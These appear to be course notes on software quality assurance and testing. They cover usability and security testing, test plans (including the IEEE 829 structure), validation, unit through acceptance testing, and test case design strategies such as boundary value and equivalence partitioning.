According to Nielsen, usability can be defined in terms of five factors: efficiency of use, learnability, memorability, errors/safety, and satisfaction. According to him, the usability of the product will be good, and the system usable, if it possesses these factors.

Nigel Bevan and Macleod considered usability to be a quality requirement that can be measured as the outcome of interactions with a computer system. This requirement is fulfilled, and the end user satisfied, if the intended goals are achieved effectively with the use of proper resources.

Molich stated in 2000 that a user-friendly system should fulfill the following five goals: easy to learn, easy to remember, efficient to use, satisfactory to use, and easy to understand.

In addition to the different definitions of usability, there are standards, quality models, and methods that define usability in the form of attributes and sub-attributes, such as ISO 9126, ISO 9241-11, ISO 13407, and IEEE Std 610.12.

UI vs Usability Testing

UI testing involves testing the graphical user interface of the software. UI testing ensures that the GUI conforms to the requirements in terms of color, alignment, size, and other properties.

On the other hand, usability testing ensures that a good and user-friendly GUI is designed that is easy to use for the end user. UI testing can be considered a sub-part of usability testing.

Security Testing

Security testing involves testing the software in order to identify any flaws and gaps from a security and vulnerability point of view; a small injection-test sketch follows the list below. The following are the main aspects that security testing should ensure:

• Confidentiality
• Integrity
• Authentication
• Availability
• Authorization
• Non-repudiation
• Software is secure against known and unknown vulnerabilities
• Software data is secure
• Software complies with all security regulations
• Input checking and validation
• SQL injection attacks
• Injection flaws
• Session management issues
• Cross-site scripting attacks
• Buffer overflow vulnerabilities
• Directory traversal attacks
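As promised above, here is a minimal injection-test sketch using Python's sqlite3 module and unittest; lookup_user() is a hypothetical data-access function under test. Because it binds user input with a parameterized query, the classic injection payload matches nothing.

import sqlite3
import unittest

def lookup_user(conn, username):
    # Parameterized query: user input is bound, never concatenated into SQL.
    cur = conn.execute("SELECT name FROM users WHERE name = ?", (username,))
    return cur.fetchall()

class InjectionTest(unittest.TestCase):
    def test_injection_payload_returns_nothing(self):
        conn = sqlite3.connect(":memory:")
        conn.execute("CREATE TABLE users (name TEXT)")
        conn.execute("INSERT INTO users VALUES ('alice')")
        payload = "alice' OR '1'='1"
        self.assertEqual(lookup_user(conn, payload), [])

if __name__ == "__main__":
    unittest.main()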

Portability Testing

Portability testing involves testing the software with the intent that it should be reusable and movable from one environment to another. The following are strategies that can be used for portability testing:

• Transferring the installed software from one computer to another.
• Building an executable (.exe) to run the software on different platforms.

Portability testing can be considered one of the sub-parts of system testing, as this testing type covers the overall testing of the software with respect to its usage across different environments. Computer hardware, operating systems, and browsers are the major focus of portability testing. The following are some preconditions for portability testing:

• The software should be designed and coded keeping in mind the portability requirements.
• Unit testing has been performed on the associated components.
• Integration testing has been performed.
• The test environment has been established.

Software Testing Documentation

Testing documentation involves documenting the artifacts that should be developed before or during the testing of software.

Documentation for software testing helps in estimating the required testing effort, test coverage, requirement tracking/tracing, etc. This section describes some commonly used documented artifacts related to software testing:

• Test Plan
• Test Scenario
• Test Case
• Traceability Matrix

Test Plan

A test plan outlines the strategy that will be used to test an application, the resources that will be used, the test environment in which testing will be performed, the limitations of the testing, and the schedule of testing activities. Typically, the quality assurance team lead is responsible for writing the test plan.

A test plan will include the following:

• Introduction to the test plan document
• Assumptions made when testing the application
• List of test cases included in testing the application
• List of features to be tested
• The approach to use when testing the software
• List of deliverables that need to be tested
• The resources allocated for testing the application
• Any risks involved during the testing process
• A schedule of tasks and milestones as testing is started

Test Scenario

A test scenario is a one-line statement that tells what area of the application will be tested. Test scenarios are used to ensure that all process flows are tested from end to end. A particular area of an application can have as few as one test scenario or as many as a few hundred, depending on the magnitude and complexity of the application.

The terms test scenario and test case are used interchangeably; however, the main difference is that a test scenario has several steps, whereas a test case has a single step. Viewed from this perspective, test scenarios are test cases, but they include several test cases and the sequence in which they should be executed. Apart from this, each test may depend on the output from the previous test.

Test Case


Test cases involve a set of steps, conditions, and inputs that can be used while performing testing tasks. The main intent of this activity is to determine whether the software passes or fails in terms of its functionality and other aspects. There are many types of test cases: functional, negative, error, logical, physical, UI test cases, etc.

Furthermore, test cases are written to keep track of the testing coverage of the software. Generally, there is no formal template used when writing test cases. However, the following components are always included in every test case:

• Test case ID
• Product module
• Product version
• Revision history
• Purpose
• Assumptions
• Preconditions
• Steps
• Expected outcome
• Actual outcome
• Postconditions

Many test cases can be derived from a single test scenario. In addition, multiple test cases are sometimes written for a single piece of software; collectively, they are known as a test suite.
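For illustration, a test case with the components above can be represented as a simple record; the field values here are hypothetical.

from dataclasses import dataclass

@dataclass
class TestCase:
    case_id: str
    module: str
    version: str
    purpose: str
    preconditions: list
    steps: list
    expected_outcome: str
    actual_outcome: str = ""   # filled in during execution

tc = TestCase(
    case_id="TC-042",
    module="Login",
    version="1.3",
    purpose="Valid credentials reach the dashboard",
    preconditions=["User 'alice' exists"],
    steps=["Open /login", "Enter credentials", "Click Submit"],
    expected_outcome="Dashboard page is displayed",
)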

Traceability Matrix

A traceability matrix (also known as a Requirement Traceability Matrix, or RTM) is a table used to trace requirements during the software development life cycle. It can be used for forward tracing (i.e., from requirements to design or coding) or backward tracing (i.e., from coding to requirements). There are many user-defined templates for the RTM.

Each requirement in the RTM document is linked with its associated test case so that testing can be done as per the stated requirements. Furthermore, each bug ID is also included and linked with its associated requirements and test case. The main goals of this matrix are (a toy matrix follows the list):

• To make sure the software is developed as per the stated requirements.
• To help in finding the root cause of any bug.
• To help in tracing the developed documents during different phases of the SDLC.
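A toy traceability matrix, with hypothetical requirement, test case, and bug IDs, might look like this in code; the forward-tracing check flags requirements that no test case covers.

rtm = {
    "REQ-01": {"tests": ["TC-042"], "bugs": []},
    "REQ-02": {"tests": ["TC-043", "TC-044"], "bugs": ["BUG-7"]},
    "REQ-03": {"tests": [], "bugs": []},
}

# Forward tracing: every requirement should have at least one covering test.
uncovered = [req for req, row in rtm.items() if not row["tests"]]
print("Requirements without tests:", uncovered)   # -> ['REQ-03']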


Software Testing Estimation Techniques

Estimating the effort for testing is one of the major and important tasks in the SDLC. Correct estimation helps in testing the software with maximum coverage. This section describes some techniques that can be useful in estimating the testing effort.

Function Point Analysis

This method is based on the analysis of the functional user requirements of the software, with the following categories:

• Outputs
• Inquiries
• Inputs
• Internal files
• External files

Test Point Analysis

This estimation process applies function point analysis to black box or acceptance testing. The main elements of this method are size, productivity, strategy, interfacing, complexity, and uniformity.

Mark-II method

This is an estimation method used for analyzing and measuring estimates based on the end user's functional view. The procedure for the Mark-II method is (a small sizing sketch follows the list):

• Determine the viewpoint
• Purpose and type of count
• Define the boundary of the count
• Identify the logical transactions
• Identify and categorize data entity types
• Count the input data element types
• Count the functional size
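As a small sizing sketch, assuming the industry-average Mark-II weights usually quoted for the method (0.58 per input data element type, 1.66 per entity referenced, 0.26 per output data element type), with hypothetical transactions:

# Each logical transaction is (input data element types, entities referenced,
# output data element types); the transactions themselves are made up.
transactions = [
    (5, 2, 3),   # e.g. "create order"
    (2, 1, 8),   # e.g. "print invoice"
]

size = sum(0.58 * ni + 1.66 * ne + 0.26 * no for ni, ne, no in transactions)
print(f"Mark-II functional size: {size:.2f} function points")  # -> 11.90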

Miscellaneous

You can use other popular estimation techniques like:

• Delphi Technique
• Analogy Based Estimation
• Test Case Enumeration Based Estimation
• Task (Activity) Based Estimation
• IFPUG method


Validation

Software Testing - Validation Testing

Validation is the process of evaluating software during the development process, or at the end of it, to determine whether it satisfies the specified business requirements.

Validation testing ensures that the product actually meets the client's needs. It can also be defined as demonstrating that the product fulfills its intended use when deployed in an appropriate environment.

It answers the question: are we building the right product?

Validation Testing - Workflow:

Validation testing can best be demonstrated using the V-Model. The software/product under test is evaluated during this type of testing.

Activities:

• Unit Testing
• Integration Testing
• System Testing
• User Acceptance Testing


Unit Testing

What is Unit Testing?

Unit testing is a testing technique in which individual modules are tested by the developer to determine whether there are any issues. It is concerned with the functional correctness of standalone modules.

The main aim is to isolate each unit of the system to identify, analyze and fix the defects.

Unit Testing - Advantages:

• Reduces defects in newly developed features and reduces bugs when changing existing functionality.
• Reduces the cost of testing, as defects are captured at a very early phase.
• Improves design and allows better refactoring of code.
• Unit tests, when integrated with the build, also indicate the quality of the build.


Unit Testing Techniques:

• Black box testing - the user interface, input, and output are tested.
• White box testing - the behavior of each individual function is tested.
• Gray box testing - used to execute tests, risks, and assessment methods.

Integration Testing

What is Integration Testing?

Upon completion of unit testing, the units or modules are integrated, which gives rise to integration testing. The purpose of integration testing is to verify the functional, performance, and reliability requirements between the integrated modules.

Integration Strategies:

• Big-Bang Integration
• Top-Down Integration
• Bottom-Up Integration
• Hybrid Integration

What is Top-Down Integration Testing?

Top-down integration testing is an integration testing technique in which stubs are used to simulate the behavior of lower-level modules that are not yet integrated. A stub is a module that acts as a temporary replacement for a called module and gives the same output as the actual product would.

These replacements for the called modules are known as stubs; stubs are also used when the software needs to interact with an external system.
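A minimal top-down sketch in Python: the high-level OrderService is integrated and tested while the real payment module is replaced by a stub that returns a canned answer. All names here are hypothetical.

class PaymentStub:
    def charge(self, amount):
        # Canned response standing in for the not-yet-integrated module.
        return {"status": "approved", "amount": amount}

class OrderService:
    def __init__(self, payment):
        self.payment = payment

    def place_order(self, amount):
        result = self.payment.charge(amount)
        return "confirmed" if result["status"] == "approved" else "rejected"

service = OrderService(PaymentStub())
assert service.place_order(99.0) == "confirmed"
print("top-down integration test passed with payment stub")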


What is Hybrid Integration Testing?

We know that integration testing is a phase of software testing in which standalone modules are combined and tested as a single entity. During this phase, the interfaces and the communication between the modules are tested. The two popular approaches to integration testing are top-down integration testing and bottom-up integration testing.

In Hybrid Integration Testing, we exploit the advantages of Top-down and Bottom-up approaches. As the name suggests, we make use of both the Integration techniques.

Hybrid Integration Testing - Features

• The system is viewed as three layers: the main target layer, a layer above the target layer, and a layer below the target layer.

• Testing is mainly focused on the middle (target) layer, which is selected on the basis of system characteristics and the structure of the code.

• Hybrid integration testing can be adopted if the customer wants a working version of the application as soon as possible; it aims to produce a basic working system in the earlier stages of the development cycle.

What is Big-Bang Testing?

Big bang integration testing is an integration testing strategy wherein all units are linked at once, resulting in a complete system. When this type of testing strategy is adopted, it is difficult to isolate any errors found, because attention is not paid to verifying the interfaces across individual units.


Disadvantages of Big-Bang Testing

• Defects present at the interfaces of components are identified at a very late stage, as all components are integrated in one shot.

• It is very difficult to isolate the defects found.

• There is a high probability of missing some critical defects, which might pop up in the production environment.

• It is very difficult to cover all the cases for integration testing without missing even a single scenario.

What is Bottom Up Testing?

Each component at the lower level of the hierarchy is tested individually, and then the components that rely upon these components are tested.


System Testing

What is System Testing?

System testing (ST) is a black box testing technique performed to evaluate the complete system's compliance with the specified requirements. In system testing, the functionality of the system is tested from an end-to-end perspective.

System testing is usually carried out by a team that is independent of the development team, in order to measure the quality of the system without bias. It includes both functional and non-functional testing.


User Acceptance Testing

What is User Acceptance Testing?

User acceptance testing is a testing methodology in which the clients/end users test the product to validate it against their requirements. It is performed at the client's location or at the developer's site.

For industries such as medicine or aviation, contract and regulatory compliance testing and operational acceptance testing are also carried out as part of user acceptance testing.

UAT is context dependent, and the UAT plans are prepared based on the requirements; it is not mandatory to execute all kinds of user acceptance tests. The tests may even be coordinated by, and contributed to by, the testing team.

User Acceptance Testing - In SDLC


The acceptance test cases are executed against the test data or using an acceptance test script, and then the results are compared with the expected ones.

Acceptance Criteria

Acceptance criteria are defined on the basis of the following attributes:

• Functional Correctness and Completeness
• Data Integrity
• Data Conversion
• Usability
• Performance
• Timeliness
• Confidentiality and Availability
• Installability and Upgradability
• Scalability
• Documentation

Acceptance Test Plan - Attributes

The acceptance test activities are carried out in phases. First, the basic tests are executed; if the test results are satisfactory, then the more complex scenarios are executed.

The acceptance test plan has the following attributes:

• Introduction
• Acceptance test category
• Operation environment
• Test case ID
• Test title
• Test objective
• Test procedure
• Test schedule
• Resources

The acceptance test activities are designed to reach one of the following conclusions:

1. Accept the system as delivered.
2. Accept the system after the requested modifications have been made.
3. Do not accept the system.

Acceptance Test Report - Attributes

The acceptance test report has the following attributes:

• Report identifier
• Summary of results
• Variations
• Recommendations
• Summary of to-do list
• Approval decision

Validation testing begins at the culmination of integration testing, when individual components have been exercised, the software is completely assembled as a package, and interfacing errors have been uncovered and corrected. At the validation or system level, the distinction between conventional software, object-oriented software, and WebApps disappears. Testing focuses on user-visible actions and user-recognizable output from the system.

Validation can be defined in many ways, but a simple (albeit harsh) definition is that validation succeeds when software functions in a manner that can be reasonably expected by the customer. At this point a battle-hardened software developer might protest: "Who or what is the arbiter of reasonable expectations?" If a Software Requirements Specification has been developed, it describes all user-visible attributes of the software and contains a Validation Criteria section that forms the basis for a validation-testing approach.

17.6.1 Validation-Test Criteria

Software validation is achieved through a series of tests that demonstrate conformity with requirements. A test plan outlines the classes of tests to be conducted, and a test procedure defines specific test cases that are designed to ensure that all functional requirements are satisfied, all behavioral characteristics are achieved, all content is accurate and properly presented, all performance requirements are attained, documentation is correct, and usability and other requirements are met (e.g., transportability, compatibility, error recovery, maintainability).

After each validation test case has been conducted, one of two possible conditions exists: (1) the function or performance characteristic conforms to specification and is accepted, or (2) a deviation from specification is uncovered and a deficiency list is created. Deviations or errors discovered at this stage in a project can rarely be corrected prior to scheduled delivery. It is often necessary to negotiate with the customer to establish a method for resolving deficiencies.

17.6.2 Configuration Review

An important element of the validation process is a configuration review. The intent of the review is to ensure that all elements of the software configuration have been properly developed, are cataloged, and have the necessary detail to bolster the support activities. The configuration review, sometimes called an audit, is discussed in more detail in Chapter 22.

17.6.3 Alpha and Beta Testing

It is virtually impossible for a software developer to foresee how the customer will really use a program. Instructions for use may be misinterpreted; strange combinations of data may be regularly used; output that seemed clear to the tester may be unintelligible to a user in the field.

When custom software is built for one customer, a series of acceptance tests are conducted to enable the customer to validate all requirements. Conducted by the end user rather than software engineers, an acceptance test can range from an informal "test drive" to a planned and systematically executed series of tests. In fact, acceptance testing can be conducted over a period of weeks or months, thereby uncovering cumulative errors that might degrade the system over time.

Like all other testing steps, validation tries to uncover errors, but the focus is at the requirements level, on things that will be immediately apparent to the end user.

"Given enough eyeballs, all bugs are shallow (e.g., given a large enough beta-tester and co-developer base, almost every problem will be characterized quickly and the fix obvious to someone)." - E. Raymond

If software is developed as a product to be used by many customers, it is impractical to perform formal acceptance tests with each one. Most software product builders use a process called alpha and beta testing to uncover errors that only the end user seems able to find.

The alpha test is conducted at the developer's site by a representative group of end users. The software is used in a natural setting with the developer "looking over the shoulder" of the users and recording errors and usage problems. Alpha tests are conducted in a controlled environment.

The beta test is conducted at one or more end-user sites. Unlike alpha testing, the developer generally is not present. Therefore, the beta test is a "live" application of the software in an environment that cannot be controlled by the developer. The customer records all problems (real or imagined) that are encountered during beta testing and reports these to the developer at regular intervals. As a result of problems reported during beta tests, you make modifications and then prepare for release of the software product to the entire customer base.

A variation on beta testing, called customer acceptance testing, is sometimes performed when custom software is delivered to a customer under contract. The customer performs a series of specific tests in an attempt to uncover errors before accepting the software from the developer. In some cases (e.g., a major corporate or governmental system) acceptance testing can be very formal and encompass many days or even weeks of testing.



Test plan

What is a Test Plan?

Test planning is the most important activity for ensuring that there is initially a list of tasks and milestones in a baseline plan against which the progress of the project can be tracked. It also defines the size of the test effort.

The test plan is the main document, often called the master test plan or the project test plan, and it is usually developed during the early phase of the project.

In software testing, a test plan gives detailed information regarding an upcoming testing effort, including:


• Scope of testing
• Schedule
• Test deliverables
• Release criteria
• Risks and contingencies

A test plan is a document describing the approach to be taken for the intended testing activities; it serves as a service level agreement between the quality assurance testing function and other interested parties, such as development. A test plan should be developed early in the development cycle and should help improve the interactions of the analysis, design, and coding activities. A test plan defines the test objectives, scope, strategy and approach, test procedures, test environment, test completion criteria, test cases, items to be tested, the tests to be performed, the test schedules, personnel requirements, reporting procedures, assumptions, risks, and contingency planning.

Test Planning Activities:

• Determining the scope and the risks that need to be tested and those that are NOT to be tested.
• Documenting the test strategy.
• Making sure that the testing activities have been included.
• Deciding entry and exit criteria.
• Evaluating the test estimate.
• Planning when and how to test, deciding how the test results will be evaluated, and defining the test exit criterion.
• Identifying the test artifacts delivered as part of test execution.
• Defining the management information, including the metrics required, and defect resolution and risk issues.
• Ensuring that the test documentation generates repeatable test assets.

A test plan is a document detailing a systematic approach to testing a system such as a machine or software. The plan typically contains a detailed understanding of the eventual workflow.

A test plan documents the strategy that will be used to verify and ensure that a product or system meets its design specifications and other requirements. A test plan is usually prepared by or with significant input from test engineers.

Depending on the product and the responsibility of the organization to which the test plan applies, a test plan may include a strategy for one or more of the following:

• Design Verification or Compliance test - to be performed during the development or approval stages of the product, typically on a small sample of units.

Page 189: CP 7026 - Software Quality Assurance

• Manufacturing or Production test - to be performed during preparation or assembly of the product in an ongoing manner for purposes of performance verification and quality control.

• Acceptance or Commissioning test - to be performed at the time of delivery or installation of the product.

• Service and Repair test - to be performed as required over the service life of the product.

• Regression test - to be performed on an existing operational product, to verify that existing functionality didn't get broken when other aspects of the environment are changed (e.g., upgrading the platform on which an existing application runs).

A complex system may have a high level test plan to address the overall requirements and supporting test plans to address the design details of subsystems and components.

Test plan document formats can be as varied as the products and organizations to which they apply. There are three major elements that should be described in the test plan: Test Coverage, Test Methods, and Test Responsibilities. These are also used in a formal test strategy.

1. Test coverage

Test coverage in the test plan states what requirements will be verified during what stages of the product life. Test coverage is derived from design specifications and other requirements, such as safety standards or regulatory codes, where each requirement or specification of the design ideally will have one or more corresponding means of verification. Test coverage for different product life stages may overlap, but will not necessarily be exactly the same for all stages. For example, some requirements may be verified during the Design Verification test, but not repeated during the Acceptance test. Test coverage also feeds back into the design process, since the product may have to be designed to allow test access.

2. Test methods

Test methods in the test plan state how test coverage will be implemented. Test methods may be determined by standards, regulatory agencies, or contractual agreement, or may have to be created new. Test methods also specify test equipment to be used in the performance of the tests and establish pass/fail criteria. Test methods used to verify hardware design requirements can range from very simple steps, such as visual inspection, to elaborate test procedures that are documented separately.

3. Test responsibilities

Test responsibilities include which organizations will perform the test methods at each stage of the product life. This allows test organizations to plan, acquire or develop test equipment and other resources necessary to implement the test methods for which they are responsible. Test responsibilities also include what data will be collected and how that data will be stored and reported (often referred to as "deliverables"). One outcome of a successful test plan should be a record or report of the verification of all design specifications and requirements as agreed upon by all parties.

A test plan is a document describing the scope, approach, objectives, resources, and schedule of a software testing effort. It identifies the items to be tested, the items not to be tested, who will do the testing, the test approach followed, what the pass/fail criteria will be, training needs for the team, the testing schedule, etc.

IEEE 829 test plan structure

IEEE 829-2008, also known as the 829 Standard for Software Test Documentation, is an IEEE standard that specifies the form of a set of documents for use in defined stages of software testing, each stage potentially producing its own separate type of document.

1. Test plan identifier
2. Introduction
3. Test items
4. Features to be tested
5. Features not to be tested
6. Approach
7. Item pass/fail criteria
8. Suspension criteria and resumption requirements
9. Test deliverables
10. Testing tasks
11. Environmental needs
12. Responsibilities
13. Staffing and training needs
14. Schedule
15. Risks and contingencies
16. Approvals

The structure of a test plan

Test plans obviously vary, depending on the project and the organization involved in the testing. Sections that would typically be included for a large system are:

The testing process

A description of the major phases of the system testing process. This may be broken down into the testing of individual sub-systems, the testing of external system interfaces, etc.


Requirements traceability
Users are most interested in the system meeting its requirements, and testing should be planned so that all requirements are individually tested.

Tested items
The products of the software process that are to be tested should be specified.

Testing schedule
An overall testing schedule and resource allocation. This schedule should be linked to the more general project development schedule.

Test recording procedures
It is not enough simply to run tests; the results of the tests must be systematically recorded. It must be possible to audit the testing process to check that it has been carried out correctly.

Hardware and software requirements
This section should set out the software tools required and estimated hardware utilization.

Constraints
Constraints affecting the testing process, such as staff shortages, should be anticipated in this section.

System tests
This section, which may be completely separate from the test plan, defines the test cases that should be applied to the system. These tests are derived from the system requirements specification.

TEST PLAN TYPES

One can have the following types of test plans:

• Master Test Plan: A single high-level test plan for a project/product that unifies all other test plans.


• Testing Level Specific Test Plans: Plans for each level of testing.
  o Unit Test Plan
  o Integration Test Plan
  o System Test Plan
  o Acceptance Test Plan

• Testing Type Specific Test Plans: Plans for major types of testing like Performance Test Plan and Security Test Plan.

Test Strategy and Test Logistics

Test Plan: the set of ideas that guide a test project
Test Strategy: the set of ideas that guide test design
Test Logistics: the set of ideas that guide the application of resources to fulfil a test strategy

While developing a test plan, one should be sure that it is simple, complete, current, and accessible to the appropriate individuals for feedback and approval. A good test plan flows logically and minimizes redundant testing; demonstrates full functional coverage; provides workable procedures for monitoring, tracking, and reporting test status; contains a clear definition of the roles and responsibilities of the parties involved and the target delivery dates; and clearly documents the test results.


There are two ways of building a test plan. The first approach is a master test plan which provides an overview of each detailed test plan, i.e., a test plan of a test plan. A detailed test plan verifies a particular phase in the waterfall development life cycle. Examples include unit, integration, system, and acceptance test plans. Other detailed test plans cover application enhancements, regression testing, and package installation. Unit test plans are code oriented and very detailed, but short because of their limited scope. System or acceptance test plans focus on the functional, or black-box, view of the entire system, not just a software unit. The second approach is one test plan. This approach includes all the test types in one test plan, often called the acceptance/system test plan, and covers unit, integration, system, and acceptance testing and all the planning considerations needed to complete the tests.

A major component of a test plan, often in the Test Procedure section, is a test case. A test case defines the step-by-step process whereby a test is executed. It includes the objectives and conditions of the test, the steps needed to set up the test, the data inputs, the expected results, and the actual results. Other information such as the software environment, version, test ID, screen, and test type are also provided.

Major steps to develop a test plan:

A test plan is the basis for accomplishing testing and should be considered a living document, i.e., as the application changes, the test plan should change. A good test plan encourages the attitude of “quality before design and coding.” It is able to demonstrate that it provides full functional coverage and that the test cases trace back to the functions being tested. It also contains workable mechanisms for monitoring and tracking discovered defects and reporting status. The following are the major steps that need to be completed to build a good test plan:

• Define the Test Objectives. The first step for planning any test is to establish what is to be accomplished as a result of the testing. This step ensures that all responsible individuals contribute to the definition of the test criteria that will be used. The developer of a test plan determines what is going to be accomplished with the test, the specific tests to be performed, the test expectations, the critical success factors of the test, constraints, scope of the tests to be performed, the expected end products of the test, a final system summary report, and the final signatures and approvals. The test objectives are reviewed and approval for the objectives is obtained.

• Develop the Test Approach. The test plan developer outlines the overall approach, or how each test will be performed. This includes the testing techniques that will be used, test entry criteria, test exit criteria, procedures to coordinate testing activities with development, and the test management approach, such as defect reporting and tracking, test progress tracking, status reporting, test resources and skills, risks, and a definition of the test basis (functional requirement specifications, etc.).

• Define the Test Environment. The test plan developer examines the physical test facilities, defines the hardware, software, and networks, determines which automated test tools and support tools are required, defines the help desk support required, builds special software required for the test effort, and develops a plan to support the above.

• Develop the Test Specifications. The developer of the test plan forms the test team to write the test specifications, develops test specification format standards, divides up the work tasks and work breakdown, assigns team members to tasks, and identifies features to be tested. The test team documents the test specifications for each feature and cross-references them to the functional specifications. It also identifies the interdependencies and workflow of the test specifications and reviews the test specifications.

• Schedule the Test. The test plan developer develops a test schedule based on the resource availability and development schedule, compares the schedule with deadlines, balances resources and work load demands, defines major checkpoints, and develops contingency plans.

• Review and Approve the Test Plan. The test plan developer or manager schedules a review meeting with the major players, reviews the plan in detail to ensure it is complete and workable, and obtains approval to proceed.

An effective test plan comprises the following 16 essential parts:

1) Test plan identification: A unique identifier is to be allocated so that the test plan document can be distinguished from all other documents.

2) Brief Introduction: A summary of the software to be tested. A brief description and history may be included to set the context. References to other relevant documents useful for understanding the test plan are appropriate. Definitions of unfamiliar terms may be included.

3) Items to be tested: A comprehensive list of the software items that are to be tested is to be documented. This is the list of software application areas that are the object of testing.

4) Features to be tested: A comprehensive list of characteristics of all the items to be tested. These include functionality, performance, security, portability, usability, etc.

5) Features not to be tested: Identifies characteristics of the items that need not be covered by the testing effort, along with a brief outline of the reasons for not doing so.

6) Approach of testing: It covers the overall approach to testing that will ensure that all items and their features will be adequately tested.

Page 195: CP 7026 - Software Quality Assurance

7) Acceptance criteria: It describes the criteria for determining whether each test item has passed or failed during testing.

8) Suspension criteria and resumption requirements: It describes different conditions under which testing will be suspended and the subsequent conditions under which testing will be resumed.

9) Test deliverables: It describes the documents expected to be created as a part of the testing process.

10) Testing tasks: It describes set of tasks required to perform the testing.

11) Environmental requirements: It specifies the environment required to perform the testing including hardware, software, communications, facilities, tools, people, etc.

12) Responsibilities: Identifies the individuals or group of people responsible for executing the testing related tasks.

13) Manpower and training needs: Specifies the number and types of persons required to perform the testing, including the skills needed.

14) Schedule of testing: Defines the important key milestones and dates in the testing process.

15) Risks and contingencies: Identifies high-risk assumptions of the testing plan. Specifies prevention and mitigation plans for each one of them.

16) Approval Responsibility: It defines the names and titles of every individual who must approve the plan.


Test cases

DEFINITION

A test case is a set of conditions or variables under which a tester will determine whether a system under test satisfies requirements or works correctly.

The process of developing test cases can also help find problems in the requirements or design of an application.

A test case is a document, which has a set of test data, preconditions, expected results and post conditions, developed for a particular test scenario in order to verify compliance against a specific requirement.

A test case acts as the starting point for test execution; after a set of input values is applied, the application has a definitive outcome and leaves the system at some end point, also known as the execution postcondition.
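To make these elements concrete, here is a minimal sketch (in Python) of how a test case could be represented as a structured record; the field names are illustrative assumptions, not a prescribed format:

    from dataclasses import dataclass, field
    from typing import Dict, List

    @dataclass
    class TestCase:
        test_id: str                  # unique identifier, e.g. "TC_001" (hypothetical naming)
        requirement_id: str           # requirement this case verifies, for traceability
        preconditions: List[str]      # state the system must be in before execution
        steps: List[str]              # ordered actions the tester performs
        test_data: Dict[str, str]     # input values applied during the steps
        expected_result: str          # outcome that constitutes a pass
        postconditions: List[str] = field(default_factory=list)  # system state afterwards
        actual_result: str = ""       # recorded during execution, compared to expected_result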

WRITING GOOD TEST CASES

• As far as possible, write test cases in such a way that you test only one thing at a time. Do not overlap or complicate test cases. Attempt to make your test cases ‘atomic’.
• Ensure that all positive scenarios and negative scenarios are covered.
• Language:
  o Write in simple and easy-to-understand language.
  o Use active voice: Do this, do that.
  o Use exact and consistent names (of forms, fields, etc.).
• Characteristics of a good test case:
  o Accurate: Tests exactly what it is intended to test.
  o Economical: No unnecessary steps or words.
  o Traceable: Capable of being traced to requirements.
  o Repeatable: Can be used to perform the test over and over.
  o Reusable: Can be reused if necessary.

Example:

Let us say that we need to check an input field that can accept maximum of 10 characters.

While developing the test cases for the above scenario, the test cases are documented as follows. In the example below, the first case is a pass scenario while the second case is a FAIL. If the expected result doesn't match the actual result, we log a defect. The defect goes through the defect life cycle, and the testers address it after the fix.
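A sketch of the two documented cases, written as Python unit tests against a hypothetical validator (the function accepts is assumed purely for illustration):

    import unittest

    def accepts(value: str) -> bool:
        """Hypothetical validator for a field accepting at most 10 characters."""
        return len(value) <= 10

    class InputFieldTests(unittest.TestCase):
        def test_exactly_ten_characters_accepted(self):
            # Pass scenario: expected and actual results match.
            self.assertTrue(accepts("a" * 10))

        def test_eleven_characters_rejected(self):
            # Fail scenario: if the field accepted 11 characters, the expected
            # result would not match the actual result and a defect is logged.
            self.assertFalse(accepts("a" * 11))

    if __name__ == "__main__":
        unittest.main()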

A good test case has certain characteristics which are:

1. It should be accurate and test what it is intended to test.
2. No unnecessary steps should be included in it.
3. It should be reusable.
4. It should be traceable to requirements.
5. It should be compliant with regulations.
6. It should be independent, i.e., you should be able to execute it in any order without any dependency on other test cases.
7. It should be simple and clear; any tester should be able to understand it by reading it once.

Keeping these characteristics in mind, you can write good and effective test cases.

Objectives behind running the test cases.

1. Find the defects in software products
2. Verify that the software meets the end-user requirements
3. Improve software quality
4. Minimize the maintenance and software support costs
5. Avoid post-deployment risks
6. Ensure compliance with processes
7. Help management make software delivery decisions

TEST CASE TEMPLATE

A test case can have the following elements. Note, however, that normally a test management tool is used by companies and the format is determined by the tool used.


Test Execution Phases

Test cases are written after careful study of the requirements and specifications of the testing itself. They are designed to suit the different testing phases and can be classified as:

• Unit Test Case – It comprises the test conditions to test the software code and assess its feasibility. The code is compiled and run according to the test case, and every line of code is tested thoroughly. It is also called a ‘white-box’ test case, as it goes into the intricate details of the code and ensures that they are working correctly; it is usually done by the development team rather than the test team.

• Functional Test Case – These test cases are written to test the application at the function level. Test cases are designed based on the functional aspects and system flow of the application. You need to take care of each and every function and come up with conditions that bring in thorough verification of the application.

• System Test Case – To ensure that the application works efficiently at the system level, test designers need to write test cases that will test its performance, security, stress, recovery, etc. The complete end-to-end process flow of the system is tested using the system test cases and conditions.

• User Acceptance Test Case – The acceptance test is done by the end users of the application or a system expert, who test the application at the operational level. Based on real scenarios that the users are likely to perform, test cases are designed on a case-by-case basis.

Test Design Strategies

Depending on the type of application under test and the kinds of software bugs to be detected, test design strategies are selected and applied wherever appropriate. Below, we discuss some of the commonly used test design strategies that testers use to develop test cases:

• Branch Coverage Test Design

Test cases are designed based on the logical expressions in the software code that determine decisions in the application. The values that satisfy all the decision conditions are used as test data inputs for each and every decision point in the software program. The branch coverage test design accomplishes a high percentage of coverage of every statement and branch of the program; it is therefore also called control-flow test design or coverage-based testing.
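As a minimal illustration (the function below is invented for the example, not taken from the text), test inputs are chosen so that every decision outcome in the code is exercised at least once:

    def classify(x: int) -> str:
        # Two decision points, so four branch outcomes in total.
        if x < 0:
            return "negative"
        if x % 2 == 0:
            return "even"
        return "odd"

    # One input per branch outcome: x < 0 true; x < 0 false and x % 2 == 0 true;
    # x < 0 false and x % 2 == 0 false.
    for x in (-1, 2, 3):
        print(x, "->", classify(x))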

• Boundary Value Test Design

To detect the maximum number of bugs, test designers select test data close to the domain boundary values or limits. For example, if the boundary value or limit is 50, then you would select test data around this value, i.e., 49 and 51. The boundary value test design strategy is used because bugs tend to cluster around boundary values, where they are easy to detect; it is a commonly used test design strategy and very effective in achieving a high bug yield.

• Equivalence Class Partitioning

An equivalence class is a set of variable values that are considered equivalent. Test cases are called equivalent when they are designed to test the same thing and would detect bugs in a similar fashion. Equivalence class partitioning is based on the premise that, since the test cases in a class are similar, it is enough to test only one or two representatives instead of the entire set of test data.

• Logic Based Test Design

Every software program will have several variables that are logically related to form a decision rule. For example, ‘if AGE is greater than 60 and if EMPLOYED is NO, then OFFER TRAVEL INSURANCE must be YES’ is a decision rule that expresses the relationship between the variables in the program. Logic-based test design is used to test every logical relationship in the program and consists of several logic-based test cases.
